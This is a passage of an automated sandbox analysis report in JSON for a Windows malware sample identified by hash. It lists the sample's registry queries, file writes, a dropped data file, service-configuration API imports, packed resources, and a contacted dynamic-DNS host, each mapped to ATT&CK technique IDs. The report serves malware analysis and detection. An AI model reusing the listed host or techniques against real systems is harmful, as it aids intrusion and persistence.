Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\version.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe.Local\\\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe.Local\\\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\DD3706144BA3F88DD1606E7D06E6B0ECC4B848108A5EB6C5612B8912DA3BC6C2.EXE.LOCAL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\ProgramData\\furas\\REGISTROS.DAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" writes file \"c:\\programdata\\furas\\registros.dat\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"DD3706144BA3F88DD1606E7D06E6B0ECC4B848108A5EB6C5612B8912DA3BC6C2\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"PRODUCTNAME\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\JNDGGBDHSGSDDSACEEE-O5S4SA\"; Key: \"ELEV\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\JNDGGBDHSGSDDSACEEE-O5S4SA\"; Key: \"OKMODE\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\JNDGGBDHSGSDDSACEEE-O5S4SA\"; Key: \"DEL\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\JNDGGBDHSGSDDSACEEE-O5S4SA\"; Key: \"TIME\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\JNDGGBDHSGSDDSACEEE-O5S4SA\"; Key: \"UID\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"registros.dat\" has type \"data\"- [targetUID: 00000000-00005976]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"IsWow64Process\" with parameter \"5976\" - (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-81", "type": 7, "relevance": 5, "name": "High entropy domain detected", "description": "Contacted domain: \"computador12.ddns-ip.net\" has high entropy", "origin": "Network Traffic", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" has resource with unusual entropy \"RT_RCDATA:7.663251278942415\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"SleepConditionVariableCS\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNEL32.DLL)\n Found string \"FlsAlloc\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"InitOnceExecuteOnce\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNEL32.DLL)\n Found string \"CreateEventExW\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSemaphoreW\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNEL32.DLL)\n Found string \"CreateSemaphoreExW\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolTimer\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolWait\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSymbolicLinkW\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNEL32.DLL)\n Found string \"GetTickCount64\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileInformationByHandleEx\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNEL32.DLL)\n Found string \"SetFileInformationByHandle\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"SleepConditionVariableSRW\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNEL32.DLL)\n Found string \"CreateThreadpoolWork\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"GetLocaleInfoEx\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2, API is part of module: 